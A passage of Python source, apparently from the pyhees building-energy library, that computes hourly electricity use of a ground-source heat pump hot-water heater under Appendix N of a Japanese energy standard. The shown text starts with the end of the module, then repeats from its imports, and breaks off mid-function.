日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * (qr_out_H_hs_d_t ** 2) return E_pump_gsRW_d_t def get_a_pump_gsRW(): """apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.062196275 def get_b_pump_gsRW(): """bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.071756474 # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ def calc_E_aux_hs_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) """ # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) kauxh0 = get_kauxh0() # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) kauxh1 = get_kauxh1() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0 return E_aux_hs_d_t def get_kauxh0(): """kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) """ return 0.0433205551083371 def get_kauxh1(): """kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) """ return 0.0173758330059922 # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA): """日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) """ # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA return qr_out_H_hs_d_t # 
============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # ============================================================================ def get_q_out_H_hs_d_t(Q_out_H_hs_d_t): """日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3 return q_out_H_hs_d_t def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0) def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, 
HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t + 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6) return Q_max_H_hs_d_t # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ def get_q_loss_H_hs_d_t(): """日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) """ return 0 # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ def calc_q_max_H_hs_JRA(q_max_hs): """地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) """ # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) f_crated = get_f_crated() # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) q_max_H_hs_JRA = q_max_hs * f_crated return q_max_H_hs_JRA def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh): """温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 """ # 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh) 
def get_f_crated(): """地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) """ return 1.35 # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H): """日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) """ # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H return Theta_gsRW_d_ave_d def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType): """暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) """ # 熱交換器タイプに応じた係数取得 a_gsRW_H = get_a_gsRW_H(HeatExchangerType) b_gsRW_H = get_b_gsRW_H(HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H return Delta_Theta_gsRW_H def calc_K_gsRW_H(R_L_max, HeatExchangerType): """地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) """ # 熱交換器タイプに応じた係数取得 c_gsRW_H = get_c_gsRW_H(HeatExchangerType) d_gsRW_H = get_d_gsRW_H(HeatExchangerType) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H return K_gsRW_H def get_a_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) 
Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][0] elif HeatExchangerType == '2': return get_table_n_3()[1][0] elif HeatExchangerType == '3': return get_table_n_3()[2][0] elif HeatExchangerType == '4': return get_table_n_3()[3][0] elif HeatExchangerType == '5': return get_table_n_3()[4][0] else: raise ValueError(HeatExchangerType) def get_b_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][1] elif HeatExchangerType == '2': return get_table_n_3()[1][1] elif HeatExchangerType == '3': return get_table_n_3()[2][1] elif HeatExchangerType == '4': return get_table_n_3()[3][1] elif HeatExchangerType == '5': return get_table_n_3()[4][1] else: raise ValueError(HeatExchangerType) def get_c_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][2] elif HeatExchangerType == '2': return get_table_n_3()[1][2] elif HeatExchangerType == '3': return get_table_n_3()[2][2] elif HeatExchangerType == '4': return get_table_n_3()[3][2] elif HeatExchangerType == '5': return get_table_n_3()[4][2] else: raise ValueError(HeatExchangerType) def get_d_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][3] elif HeatExchangerType == '2': return get_table_n_3()[1][3] elif HeatExchangerType == '3': return get_table_n_3()[2][3] elif HeatExchangerType == '4': return get_table_n_3()[3][3] elif HeatExchangerType == '5': return get_table_n_3()[4][3] else: raise ValueError(HeatExchangerType) def get_table_n_3(): """表N.3 係数 Args: Returns: list: 表N.3 係数 """ table_n_3 = [ (3.1672, -0.4273, -0.0444, 0.0442), (5.9793, -1.0687, 
-0.1613, 0.1047), (8.3652, -1.5946, -0.2486, 0.1546), (9.9065, -2.1827, -0.3454, 0.2072), (10.2898, -2.8727, -0.3270, 0.2700) ] return table_n_3 def get_R_L_max(L_max_H, L_max_C): """1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) """ # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H) return R_L_max def get_L_max_H(L_H_x_t_i): """1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) """ # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_H_x_t = np.sum(L_H_x_t_i, axis=0) # 1次元配列を2次元配列に形状変換する L_H_x_t = np.reshape(L_H_x_t, (365, 24)) # 時間軸合算 L_H_x = np.sum(L_H_x_t, axis=1) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = np.max(L_H_x) return L_max_H def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i): """1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) """ # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_CS_x_t = np.sum(L_CS_x_t_i, axis=0) L_CL_x_t = np.sum(L_CL_x_t_i, axis=0) # L_CS_x_tとL_CL_x_tの要素同士を足す L_C_x_t = L_CS_x_t + L_CL_x_t # 1次元配列を2次元配列に形状変換する L_C_x_t = np.reshape(L_C_x_t, (365, 24)) # 時間軸合算 L_C_x = np.sum(L_C_x_t, axis=1) # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = np.max(L_C_x) return L_max_C
# ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ import numpy as np from pyhees.section4_7_common import get_Q_out_H_hs_d_t from pyhees.section4_8_a import calc_e_ref_H_th import pyhees.section4_7_h as appendix_H # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, 
Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) q_loss_H_hs_d_t = get_q_loss_H_hs_d_t() # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8) E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) Mu_d_t = calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 
日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0 return E_E_hs_d_t # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ def get_E_G_hs_d_t(): """熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ def get_E_K_hs_d_t(): """熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ def get_E_M_hs_d_t(): """熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t): """日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 """ # 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) k_comp_a = -0.7309 k_comp_b = 0.67 k_comp_c = 1.0319 # 
日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t) E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0 return E_comp_hs_d_t, f_comp_act_d_t def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t): """日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) """ # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_0 = get_K_Mu_h_0() # Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_1 = get_K_Mu_h_1() # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_2 = get_K_Mu_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0 Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0 return Mu_d_t def get_K_Mu_h_0(): """Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return -0.430363368361459 def get_K_Mu_h_1(): """Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.698531770387591 def get_K_Mu_h_2(): """Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.0100164335768507 def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) """ # Kevph0:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_0 = get_K_evp_h_0() # 
Kevph1:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_1 = get_K_evp_h_1() # Kevph2:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_2 = get_K_evp_h_2() # Kevph12:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_12 = get_K_evp_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24) + K_evp_h_2 * qr_out_H_hs_d_t + K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None) return Theta_ref_evp_d_t def get_K_evp_h_0(): """Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 """ return -2.95315205817646 def get_K_evp_h_1(): """Kevph1:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 """ return 0.915893610614308 def get_K_evp_h_2(): """Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 """ return -11.8319776584846 def get_K_evp_h_12(): """Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 """ return 0.29704275467947 def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) """ # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_0 = get_K_cnd_h_0() # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_1 = get_K_cnd_h_1() # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_2 = get_K_cnd_h_2() # 